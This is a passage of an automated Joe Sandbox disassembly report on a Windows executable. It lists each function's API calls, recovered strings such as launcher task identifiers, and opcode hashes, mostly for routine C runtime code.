                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4167703944-0
                                                                                                                                                      • Opcode ID: 76ecdf4abb5c9d6e4730d336aa4ed42852a12889e33b42b6854653d10d150544
                                                                                                                                                      • Instruction ID: f94551d0b180acb98bca3c25dca5fd75217ec5d2b91c6eebe384a79b1f0ad324
                                                                                                                                                      • Opcode Fuzzy Hash: 76ecdf4abb5c9d6e4730d336aa4ed42852a12889e33b42b6854653d10d150544
                                                                                                                                                      • Instruction Fuzzy Hash: 28217E73E4031467DF20A6752C43BEB3348AB45715F04069AFF18EB2C1EA5D988683ED
                                                                                                                                                      APIs
                                                                                                                                                      • __getptd.LIBCMT ref: 00415EA3
                                                                                                                                                        • Part of subcall function 00416841: __getptd_noexit.LIBCMT ref: 00416844
                                                                                                                                                        • Part of subcall function 00416841: __amsg_exit.LIBCMT ref: 00416851
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00415EC3
                                                                                                                                                      • __lock.LIBCMT ref: 00415ED3
                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00415EF0
                                                                                                                                                      • _free.LIBCMT ref: 00415F03
                                                                                                                                                      • InterlockedIncrement.KERNEL32(004304F8), ref: 00415F1B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3470314060-0
                                                                                                                                                      • Opcode ID: 64aacbd154439050355b0105d418cfbe868bba507bb6dff041487b75a4529be2
                                                                                                                                                      • Instruction ID: 666f727ee5236ad751bbd60f5143e2be873cd4defde857ce3df78ec67e0369fb
                                                                                                                                                      • Opcode Fuzzy Hash: 64aacbd154439050355b0105d418cfbe868bba507bb6dff041487b75a4529be2
                                                                                                                                                      • Instruction Fuzzy Hash: 1301C031E05B19EBDB21AB6598467DA73A0BF84714F15011BEC10A7381DB3CAAC2DBDD
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C6FB9493,00000000,?,00000001), ref: 004035A3
                                                                                                                                                      • _wcsrchr.LIBCMT ref: 004035B6
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000001), ref: 004035CE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CurrentDirectoryFileModuleName_wcsrchr
                                                                                                                                                      • String ID: log$register
                                                                                                                                                      • API String ID: 603228450-1130157763
                                                                                                                                                      • Opcode ID: 08ef2cd8552d64b021087630f6c97d8c3824145298a4f84e84184ce598c96753
                                                                                                                                                      • Instruction ID: 107d6a80d698f550d366be7666382815e05da8c8a50b4613ac0a3b839ff3cd87
                                                                                                                                                      • Opcode Fuzzy Hash: 08ef2cd8552d64b021087630f6c97d8c3824145298a4f84e84184ce598c96753
                                                                                                                                                      • Instruction Fuzzy Hash: FF91E3B1601605AFC714DFA8CC45B9AB7B9FF88324F1482A9E4199B2D1DB34EE44CF94
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00402A90: __wcsicoll.LIBCMT ref: 00402AB3
                                                                                                                                                        • Part of subcall function 00402A90: __wcsicoll.LIBCMT ref: 00402AEF
                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00405515
                                                                                                                                                      Strings
                                                                                                                                                      • agent_task_add, xrefs: 00405435
                                                                                                                                                      • taskId=TASK_LAUNCH_VAULT&allowDuplicates=1, xrefs: 004054AB
                                                                                                                                                      • list<T> too long, xrefs: 00405510
                                                                                                                                                      • '%s' is not a recognized command Id, xrefs: 0040546F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __wcsicoll$Xinvalid_argumentstd::_
                                                                                                                                                      • String ID: '%s' is not a recognized command Id$agent_task_add$list<T> too long$taskId=TASK_LAUNCH_VAULT&allowDuplicates=1
                                                                                                                                                      • API String ID: 738070571-3830114783
                                                                                                                                                      • Opcode ID: 73d2313ef4ca0c44209152350d997199626b350e51a2dc92e81e401f3a4541fc
                                                                                                                                                      • Instruction ID: 2877e8e1ee730d82884497b78d13055ad23c509a160683405d2cfcdd003b873f
                                                                                                                                                      • Opcode Fuzzy Hash: 73d2313ef4ca0c44209152350d997199626b350e51a2dc92e81e401f3a4541fc
                                                                                                                                                      • Instruction Fuzzy Hash: 8441C3716006059FC704DFA8D941AAAB7B4FF85324F10836EE426A73D1D734AE40CF94
                                                                                                                                                      APIs
                                                                                                                                                      • _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                        • Part of subcall function 00415170: __FF_MSGBANNER.LIBCMT ref: 00415189
                                                                                                                                                        • Part of subcall function 00415170: __NMSG_WRITE.LIBCMT ref: 00415190
                                                                                                                                                        • Part of subcall function 00415170: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00416F22,?,00000001,?,?,0041B525,00000018,0042D5F0,0000000C,0041B5B5), ref: 004151B5
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00413BEB
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00413C05
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00413C16
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 1414122017-962849395
                                                                                                                                                      • Opcode ID: 71bb43113b03fda9e75c22da8486a42dfa7a218c335d59594391c918980907c1
                                                                                                                                                      • Instruction ID: 6a8bc27a46bf097875d484f5a0b5e3f95a16b6a6685c49e19060bb533e89cc82
                                                                                                                                                      • Opcode Fuzzy Hash: 71bb43113b03fda9e75c22da8486a42dfa7a218c335d59594391c918980907c1
                                                                                                                                                      • Instruction Fuzzy Hash: 7AF0F975604215AACB00EF55EC02AEDB6A46F40758F50006FFC05A61E1EB7CAB84864D
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(eadcommand:,?,00000001,00403CC0,00000000,00000001,00000001,00000001), ref: 00405090
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                      • String ID: %20-$?cmd=$Could not find '%s' in command line: '%s'$eadcommand:
                                                                                                                                                      • API String ID: 1659193697-2334872083
                                                                                                                                                      • Opcode ID: 2f1ba494e88771337f45c52a1bdd7358bb1a852e26cadc68df8db2b6343d09fe
                                                                                                                                                      • Instruction ID: d20ee6b8477c0c243330d9cee297807aef4a887e61db8673c5507edcc9854c4b
                                                                                                                                                      • Opcode Fuzzy Hash: 2f1ba494e88771337f45c52a1bdd7358bb1a852e26cadc68df8db2b6343d09fe
                                                                                                                                                      • Instruction Fuzzy Hash: 91D1B471A00A059FCB04DF68C885B5FB7A4FF85324F14826EE825AB3D1D778A905CF98
                                                                                                                                                      APIs
                                                                                                                                                      • __getptd.LIBCMT ref: 00416624
                                                                                                                                                        • Part of subcall function 00416841: __getptd_noexit.LIBCMT ref: 00416844
                                                                                                                                                        • Part of subcall function 00416841: __amsg_exit.LIBCMT ref: 00416851
                                                                                                                                                      • __getptd.LIBCMT ref: 0041663B
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00416649
                                                                                                                                                      • __lock.LIBCMT ref: 00416659
                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0041666D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                      • Opcode ID: c0b35fab3b28cc08379f738c0b6819e885caef556e0597232c6272927c57954c
                                                                                                                                                      • Instruction ID: aa41efd1d423b8a5d10240cf30fe7f6fdfe2eb4a552ee744cdd5a7d3d78d06b6
                                                                                                                                                      • Opcode Fuzzy Hash: c0b35fab3b28cc08379f738c0b6819e885caef556e0597232c6272927c57954c
                                                                                                                                                      • Instruction Fuzzy Hash: BEF09631D443149BD625BB7AA807BDD37A06F00718F12010FFC54662C2CB2C99C0DA5D
                                                                                                                                                      APIs
                                                                                                                                                      • UrlEscapeW.SHLWAPI(00000000,?,?,00408B1C), ref: 0040D8FC
                                                                                                                                                      • UrlEscapeW.SHLWAPI(00000000,?,?,00003000,?,?,00003000,80070057,?,?,00408B1C), ref: 0040D975
                                                                                                                                                        • Part of subcall function 00401000: __CxxThrowException@8.LIBCMT ref: 00401012
                                                                                                                                                      • _wcsnlen.LIBCMT ref: 0040D98A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Escape$Exception@8Throw_wcsnlen
                                                                                                                                                      • String ID: pOtPJt
                                                                                                                                                      • API String ID: 3869000346-1176437184
                                                                                                                                                      • Opcode ID: 5ca6acc30a430e574c9760774463274ab4bad4654caa39c02441de65d58d91ac
                                                                                                                                                      • Instruction ID: d1cb98987559650d629e73c162e3cbdd425e347001b25a3870b1e644c1132242
                                                                                                                                                      • Opcode Fuzzy Hash: 5ca6acc30a430e574c9760774463274ab4bad4654caa39c02441de65d58d91ac
                                                                                                                                                      • Instruction Fuzzy Hash: 9E51D471A006019FE711DFB9C881B5EB7E1EF44324F14863EE491A73E0EB78A904CB54
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406810: LoadLibraryW.KERNEL32(?,00000010,?,?,?,?,00000000,00000000), ref: 00406849
                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0040491B
                                                                                                                                                      • MessageBoxW.USER32(00000000), ref: 00404922
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DesktopLibraryLoadMessageWindow
                                                                                                                                                      • String ID: Error$core_launch_failure
                                                                                                                                                      • API String ID: 2291125156-1231388645
                                                                                                                                                      • Opcode ID: ac2b762cd6f21a1793c955fc009723a0a690ed81f3d34301eb5dcc339244b6ac
                                                                                                                                                      • Instruction ID: b6af9d4a25f12b9ad618caaa04b1bce89d1bc1c33f14e2b071967ea1dc6fa62c
                                                                                                                                                      • Opcode Fuzzy Hash: ac2b762cd6f21a1793c955fc009723a0a690ed81f3d34301eb5dcc339244b6ac
                                                                                                                                                      • Instruction Fuzzy Hash: 6841F6B16006059FD704DB68C841FAAB3B5FF89324F14C7AEE525A73D1DB38AA05CB94
                                                                                                                                                      APIs
                                                                                                                                                      • lstrcmpiW.KERNEL32(console,00000000,?,?,00404392,?,?,?,00000004,00000001,00403CC0,00000000,00000001), ref: 00411895
                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 004118FD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Xinvalid_argumentlstrcmpistd::_
                                                                                                                                                      • String ID: console$list<T> too long
                                                                                                                                                      • API String ID: 223919002-314115197
                                                                                                                                                      • Opcode ID: d78708c6e26ceb291887379b36f3f026355c379ba291dcf09bcf33e7ea10b113
                                                                                                                                                      • Instruction ID: dfc77e77174de3d0180958bea3bcf2e3a491de6f7e9e655ee83e3060e2856bce
                                                                                                                                                      • Opcode Fuzzy Hash: d78708c6e26ceb291887379b36f3f026355c379ba291dcf09bcf33e7ea10b113
                                                                                                                                                      • Instruction Fuzzy Hash: C62121317002259FC710DFA9D880AA6F3D9EF48324B05C2AAED588B351DB35EC80C7D8
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __wcsicoll
                                                                                                                                                      • String ID: true$yes
                                                                                                                                                      • API String ID: 3832890014-2567188892
                                                                                                                                                      • Opcode ID: 240633a689e3ec326197cc86427cabd57f99d37e8cdc38ffffa653c739971018
                                                                                                                                                      • Instruction ID: 056d6a437137f40ddd0f9b55810a2cd9cc2c27070f95a7c871400e051a22f119
                                                                                                                                                      • Opcode Fuzzy Hash: 240633a689e3ec326197cc86427cabd57f99d37e8cdc38ffffa653c739971018
                                                                                                                                                      • Instruction Fuzzy Hash: 5A21E1716406049FD710CB99DC41B9AF3A8FB85371F14836BE924833E0E739AD05CA98
                                                                                                                                                      APIs
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00403426
                                                                                                                                                        • Part of subcall function 00413A01: std::exception::_Copy_str.LIBCMT ref: 00413A1C
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00403417
                                                                                                                                                        • Part of subcall function 00415988: RaiseException.KERNEL32(?,?,?,?), ref: 004159CA
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040343B
                                                                                                                                                        • Part of subcall function 00403560: GetModuleFileNameW.KERNEL32(00000000,?,00000104,C6FB9493,00000000,?,00000001), ref: 004035A3
                                                                                                                                                        • Part of subcall function 00403560: _wcsrchr.LIBCMT ref: 004035B6
                                                                                                                                                        • Part of subcall function 00403560: SetCurrentDirectoryW.KERNEL32(?,?,00000001), ref: 004035CE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw$Copy_strCurrentDirectoryExceptionFileModuleNameRaise_wcsrchrstd::exception::_std::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2761665094-962849395
                                                                                                                                                      • Opcode ID: 1b2f38a8a05e39e33b413d8fef802326639c188257957995a35008b92eec63ee
                                                                                                                                                      • Instruction ID: c93339cf9368618aa92baf390853cbc41d89bd29fa15fd629511ca6a49be4a75
                                                                                                                                                      • Opcode Fuzzy Hash: 1b2f38a8a05e39e33b413d8fef802326639c188257957995a35008b92eec63ee
                                                                                                                                                      • Instruction Fuzzy Hash: 3D1166B19142155BC700FFB6AC464EFB7A8AD84358F40093FF851B7181EB3C9A0886EA
                                                                                                                                                      APIs
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004111CD
                                                                                                                                                        • Part of subcall function 00413A01: std::exception::_Copy_str.LIBCMT ref: 00413A1C
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004111BE
                                                                                                                                                        • Part of subcall function 00415988: RaiseException.KERNEL32(?,?,?,?), ref: 004159CA
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004111E2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw$Copy_strExceptionRaisestd::exception::_std::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2939012366-962849395
                                                                                                                                                      • Opcode ID: 41f9b13ae497cfe8640b41a49ab00bd169d6d1b31c3e9db4d8a233446f3517e7
                                                                                                                                                      • Instruction ID: 0be7496b70bc6fec9745d464b0648aa59ac1e126cae545bd80240c4e67d28df4
                                                                                                                                                      • Opcode Fuzzy Hash: 41f9b13ae497cfe8640b41a49ab00bd169d6d1b31c3e9db4d8a233446f3517e7
                                                                                                                                                      • Instruction Fuzzy Hash: 18F054F2910118AAC711EFD4A9418EFB7E89F44304B10446BF905B2141DA795F4487FA
                                                                                                                                                      APIs
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00404B96
                                                                                                                                                        • Part of subcall function 00413A01: std::exception::_Copy_str.LIBCMT ref: 00413A1C
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00404B83
                                                                                                                                                        • Part of subcall function 00415988: RaiseException.KERNEL32(?,?,?,?), ref: 004159CA
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00404BAB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw$Copy_strExceptionRaisestd::exception::_std::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2939012366-962849395
                                                                                                                                                      • Opcode ID: 09ac8663572faa41aee483b52a40b93fdceb60dc58fff27d6276f71200c00db7
                                                                                                                                                      • Instruction ID: aa8cd1588735c51515c65f38322514867c9c2a5ba688d37fb35725eccd3fef46
                                                                                                                                                      • Opcode Fuzzy Hash: 09ac8663572faa41aee483b52a40b93fdceb60dc58fff27d6276f71200c00db7
                                                                                                                                                      • Instruction Fuzzy Hash: 7BE0ECB5990218EADF04EFD1DC46FEDB7746F48749F50440EF5053A181D77C62888A7A
                                                                                                                                                      APIs
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004109EB
                                                                                                                                                        • Part of subcall function 00413A01: std::exception::_Copy_str.LIBCMT ref: 00413A1C
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004109DC
                                                                                                                                                        • Part of subcall function 00415988: RaiseException.KERNEL32(?,?,?,?), ref: 004159CA
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00410A00
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw$Copy_strExceptionRaisestd::exception::_std::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2939012366-962849395
                                                                                                                                                      • Opcode ID: ba21db6094558bbda92e9fdb070596c334fcf61a668c5e12c5c07b178eb4eb90
                                                                                                                                                      • Instruction ID: b8b88d8bb8466062e5abec39d0c36b4c19769e7e1302a3700d13e2ed555ba46e
                                                                                                                                                      • Opcode Fuzzy Hash: ba21db6094558bbda92e9fdb070596c334fcf61a668c5e12c5c07b178eb4eb90
                                                                                                                                                      • Instruction Fuzzy Hash: 8FE01AB5950258EF8B05EF91D881CFFB7B9AFC8714B10451EF81677140CB386A09CA79
                                                                                                                                                      APIs
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004123E1
                                                                                                                                                        • Part of subcall function 00413A01: std::exception::_Copy_str.LIBCMT ref: 00413A1C
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004123D2
                                                                                                                                                        • Part of subcall function 00415988: RaiseException.KERNEL32(?,?,?,?), ref: 004159CA
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004123F6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw$Copy_strExceptionRaisestd::exception::_std::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2939012366-962849395
                                                                                                                                                      • Opcode ID: 40889c1fd86b928a8715d34bbb081b8d3721f4c1486ca8b4e1fa59dc92489ff5
                                                                                                                                                      • Instruction ID: 898793086584a8fd962b49f0ded41d37ae6e9ed1a61a4fa6f2f43884c1de653b
                                                                                                                                                      • Opcode Fuzzy Hash: 40889c1fd86b928a8715d34bbb081b8d3721f4c1486ca8b4e1fa59dc92489ff5
                                                                                                                                                      • Instruction Fuzzy Hash: 9FE0E6F1D50108DECB05EFE1D9468FFB3B89E44704B60055BF501B2141DA396F448B7A
                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?), ref: 00401234
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00401260
                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00401270
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0040128A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: QueryValue$Open__alloca_probe_16
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2359313486-0
                                                                                                                                                      • Opcode ID: b4913e222e1dc2fcb1141e5b5feffb57943d8df3763a0593eb570ac5d7465af1
                                                                                                                                                      • Instruction ID: 155446f771d410e671b768db9f992633fbdae1977b8ecb0b0f979a5b3f81bbb5
                                                                                                                                                      • Opcode Fuzzy Hash: b4913e222e1dc2fcb1141e5b5feffb57943d8df3763a0593eb570ac5d7465af1
                                                                                                                                                      • Instruction Fuzzy Hash: 1B414C71A002159FDB04CF98CC82FAEB7B8FF49324F144659E515EB390D734AA01CBA4
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileType.KERNEL32(?,0042D3F8,0000000C,00411411,00000000), ref: 00414E4B
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00414E55
                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00414E5C
                                                                                                                                                      • __set_osfhnd.LIBCMT ref: 00414EA7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileLastType__dosmaperr__set_osfhnd
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2557730991-0
                                                                                                                                                      • Opcode ID: 951e5eca8f9cf6573f11248fffb1cfec838e7949ff6b8f7a42eeaf66110f6452
                                                                                                                                                      • Instruction ID: 3cc309415f377f4129a0eb94033780c96aa18bf88aced23695ad88617a0cb697
                                                                                                                                                      • Opcode Fuzzy Hash: 951e5eca8f9cf6573f11248fffb1cfec838e7949ff6b8f7a42eeaf66110f6452
                                                                                                                                                      • Instruction Fuzzy Hash: 8321D3315453149BDB119F65D8017D97B60BFC1328F68864AE4648B2D2C77D85C2DF8D
                                                                                                                                                      APIs
                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32(00000000,004157E3), ref: 0041C3BD
                                                                                                                                                      • __malloc_crt.LIBCMT ref: 0041C3EC
                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C3F9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 237123855-0
                                                                                                                                                      • Opcode ID: 3d947bb2433fe0812e5e68e7774175b5042024a56677f6b24546ce2493f57f2c
                                                                                                                                                      • Instruction ID: 254ac7f8c54955929a6bc1e0f5671cac67dec88514963bcebe1c0ef7fa51bea3
                                                                                                                                                      • Opcode Fuzzy Hash: 3d947bb2433fe0812e5e68e7774175b5042024a56677f6b24546ce2493f57f2c
                                                                                                                                                      • Instruction Fuzzy Hash: C2F027376841245A8B307734BCC98EB2369DAD536530B846BFD11C3300FA288EC683AD
                                                                                                                                                      APIs
                                                                                                                                                      • EnterCriticalSection.KERNEL32(00431B14,?,?,?,00401093,00000000), ref: 004130A2
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00431B14,?,?,?,00401093,00000000), ref: 004130BE
                                                                                                                                                      • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?,00401093,00000000), ref: 004130DD
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00431B14,?,?,?,00401093,00000000), ref: 004130E4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$Leave$EnterExceptionRaise
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 799838862-0
                                                                                                                                                      • Opcode ID: 925c1d7a60f30651f737295a61912d32bd66dc2d6f1986c7b4fae4e702ba9d20
                                                                                                                                                      • Instruction ID: 51a6bbdecdf6f47f4ebbfeeb6a8912ade43f3678a6090e18808c6fdb105ee1f2
                                                                                                                                                      • Opcode Fuzzy Hash: 925c1d7a60f30651f737295a61912d32bd66dc2d6f1986c7b4fae4e702ba9d20
                                                                                                                                                      • Instruction Fuzzy Hash: 4FF06236304200A7D6304F55AC44FAABFE8FB89712F50456AFA02E7640C665B9478B59
                                                                                                                                                      APIs
                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0040DC34
                                                                                                                                                        • Part of subcall function 004133AC: std::exception::exception.LIBCMT ref: 004133C1
                                                                                                                                                        • Part of subcall function 004133AC: __CxxThrowException@8.LIBCMT ref: 004133D6
                                                                                                                                                        • Part of subcall function 004133AC: std::exception::exception.LIBCMT ref: 004133E7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                      • String ID: invalid map/set<T> iterator$xsB
                                                                                                                                                      • API String ID: 1823113695-3138870737
                                                                                                                                                      • Opcode ID: 80e9ecd3d8a99b7c2ec05fac0c7c45e7c623ea9851cbc8fcd2e1498487d9df48
                                                                                                                                                      • Instruction ID: a79d5b77c9b1e1c4e0fc09c71210dda7b324129ff3d958bd811fbac4ed82f6f9
                                                                                                                                                      • Opcode Fuzzy Hash: 80e9ecd3d8a99b7c2ec05fac0c7c45e7c623ea9851cbc8fcd2e1498487d9df48
                                                                                                                                                      • Instruction Fuzzy Hash: 66B1D470A05280DFD715CF68D190A26BFA1AF55304F2880EED4895F392C735ED8ACBE6
                                                                                                                                                      APIs
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004102F6
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0041030B
